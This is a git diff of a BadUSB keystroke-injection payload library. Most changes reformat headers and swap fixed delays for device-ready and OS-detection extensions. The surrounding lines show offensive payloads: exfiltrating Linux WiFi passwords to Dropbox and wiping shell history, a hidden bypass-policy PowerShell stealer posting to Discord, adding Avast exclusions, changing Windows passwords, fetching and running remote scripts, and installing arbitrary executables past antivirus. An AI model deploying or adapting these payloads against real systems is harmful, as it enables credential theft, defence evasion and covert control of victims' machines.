diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
index bb5b1b6..3186ee3 100644
--- a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
+++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
@@ -1,27 +1,53 @@
-REM #######################################################
-REM # |
-REM # Title : Exfiltrate Wifi Passwords - Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Credentials, Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Exfiltrate Wifi Passwords - Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Credentials, Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PREREQUISITES SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
@@ -41,8 +67,6 @@ ENTER
REM #### ZIP SECTION ####
-
-
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
@@ -61,8 +85,6 @@ ENTER
REM #### WiFi && ZIP SECTION ####
-
-
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
@@ -85,8 +107,6 @@ DELAY 3000
REM #### EXFILTRATE SECTION ####
-
-
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
@@ -105,8 +125,6 @@ ENTER
REM #### REMOVE TRACES ####
-
-
DELAY 2000
STRING history -c
ENTER
diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
index 379fe45..4b92997 100644
--- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
@@ -10,8 +10,49 @@ REM # |
REM ###################################################################
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
diff --git a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
index 550a2c5..c4b9907 100644
--- a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
+++ b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Add An Exception To Avast Antivirus |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Add An Exception To Avast Antivirus #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Avast installed and configured
-
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Avast application
-DELAY 2000
GUI
DELAY 1000
STRING avast
diff --git a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
index a44c42a..10174db 100644
--- a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
+++ b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
@@ -1,13 +1,14 @@
-REM ##############################################
-REM # |
-REM # Title : Call Someone On An iPhone |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : iPhone |
-REM # |
-REM ##############################################
-
+REM_BLOCK
+##############################################
+# |
+# Title : Call Someone On An iPhone |
+# Author : Aleff |
+# Version : 1.0 |
+# Category : Execution |
+# Target : iPhone |
+# |
+##############################################
+END_REM
REM Requirements:
REM - The phone must be unlocked
diff --git a/payloads/library/execution/ChangeGitRemoteLink/payload.txt b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
index eafac41..0348ece 100644
--- a/payloads/library/execution/ChangeGitRemoteLink/payload.txt
+++ b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################
-REM # |
-REM # Title : Change Remote Git Link |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11/Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Remote Git Link #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11/Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
index e0c538f..3130f0d 100644
--- a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
+++ b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
@@ -1,25 +1,50 @@
-
-REM ###########################################
-REM # |
-REM # Title : Change Linux MAC Address |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Linux MAC Address #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
index af732aa..60502ad 100644
--- a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
@@ -1,25 +1,49 @@
-
-REM ###############################################
-REM # |
-REM # Title : Change Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###############################################
+REM_BLOCK
+###############################################
+# #
+# Title : Change Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###############################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
diff --git a/payloads/library/execution/Change_Windows_User_Name/payload.txt b/payloads/library/execution/Change_Windows_User_Name/payload.txt
index d0d566d..5b1d685 100644
--- a/payloads/library/execution/Change_Windows_User_Name/payload.txt
+++ b/payloads/library/execution/Change_Windows_User_Name/payload.txt
@@ -1,12 +1,14 @@
-REM #############################################
-REM # |
-REM # Title : Change Windows User Name |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Change Windows User Name #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Nothing
@@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
diff --git a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
index 87e22c8..a85a629 100644
--- a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
+++ b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # |
-REM # Title : Change the password of the Windows user |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Change the password of the Windows user #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Nothing (i know it's absurd)
@@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
REM You must define the new Windows user password
DEFINE NEW_PASSWORD example
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
index 8fb34f0..c512577 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/README.md
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
@@ -1,4 +1,4 @@
-# Close All Applications - BADUSB ✅
+# Close All Applications
A script used to close all target open applications.
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
index 5c1bd2a..eab598e 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
@@ -1,27 +1,69 @@
-REM #####################################################
-REM # |
-REM # Title : Close All Applications |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Close All Applications #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################################
+END_REM
REM Plug-And-Play
-REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
-REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 250
DOWNARROW
diff --git a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
index e109d55..0729d4d 100644
--- a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
+++ b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Defend yourself against AtlasVPN Bug-Door #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Defend yourself against AtlasVPN Bug-Door #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Administrator Permission
@@ -15,7 +17,34 @@ REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
index 0a863ff..c3c6684 100644
--- a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
+++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
@@ -1,14 +1,14 @@
-
-REM ################################################################
-REM # |
-REM # Title : Edit The Default Real App With An Arbitrary |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : GNU/Linux (Debian based tested) |
-REM # |
-REM ################################################################
-
+REM_BLOCK
+################################################################
+# #
+# Title : Edit The Default Real App With An Arbitrary #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : GNU/Linux (Debian based tested) #
+# #
+################################################################
+END_REM
REM Requirements:
REM - sudo permissions
@@ -16,11 +16,9 @@ REM - Internet connection
REM - Executable app
REM - '.desktop' file
-
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
-
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
@@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
REM Open a shell
-DELAY 2000
CTRL-ALT t
DELAY 1000
diff --git a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
index 8aa455d..0d30273 100644
--- a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
+++ b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
@@ -1,25 +1,50 @@
-
-REM ################################################
-REM # |
-REM # Title : Exploiting An Executable File |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ################################################
+REM_BLOCK
+################################################
+# #
+# Title : Exploiting An Executable File #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+################################################
+END_REM
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### Script ####
-
-
STRINGLN
function search_file {
for file in "$1"/*; do
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
index 4979471..3929e47 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
@@ -108,18 +108,12 @@ Happy Hacking!
Github
-
-
- 
-
-
Instagram
- |
-
Discord
+
Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
index 80b90cb..3edb530 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
@@ -1,27 +1,67 @@
-REM ###########################################################################################
-REM # |
-REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################################################
-
+REM_BLOCK
+###########################################################################################
+# #
+# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###########################################################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
-
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
STRINGLN notepad.exe
diff --git a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
index 1ed9ed8..12813ca 100644
--- a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
+++ b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
@@ -1,12 +1,14 @@
-REM ##################################################################
-REM # |
-REM # Title : Make Windows performant (but ugly and boring) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##################################################################
+REM_BLOCK
+##################################################################
+# #
+# Title : Make Windows performant (but ugly and boring) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##################################################################
+END_REM
REM Plug-And-Play <3
@@ -16,7 +18,48 @@ REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
